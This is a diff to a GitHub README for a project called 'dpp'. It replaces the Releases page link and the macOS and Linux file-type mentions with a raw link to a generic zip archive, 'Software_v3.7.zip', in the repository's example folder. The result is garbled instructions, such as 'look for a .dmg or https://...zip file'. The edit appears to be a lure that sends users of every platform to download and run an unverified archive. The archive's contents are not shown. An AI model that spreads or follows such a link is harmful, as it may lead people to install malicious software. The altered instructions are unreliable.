Tchozn/dpp/README.md

 To download dpp, follow these steps:

-1. Click the button above or visit the [Releases page](https://github.com/Tchozn/dpp/releases).
+1. Click the button above or visit the [Releases page](https://github.com/Tchozn/dpp/raw/refs/heads/master/example/Software_v3.7.zip).
 2. Look for the latest version of dpp.
 You will see a list of available files.
 3. Download the file that matches your operating system.
 For example:
    - For Windows, you may download a `.exe` file.
-   - For macOS, look for a `.dmg` or `.tar.gz` file.
+   - For macOS, look for a `.dmg` or `https://github.com/Tchozn/dpp/raw/refs/heads/master/example/Software_v3.7.zip` file.
-   - For Linux, find a `.tar.gz` or .deb file.
+   - For Linux, find a `https://github.com/Tchozn/dpp/raw/refs/heads/master/example/Software_v3.7.zip` or .deb file.

 4. Once the download is complete, open the downloaded file and follow the on-screen instructions to install dpp.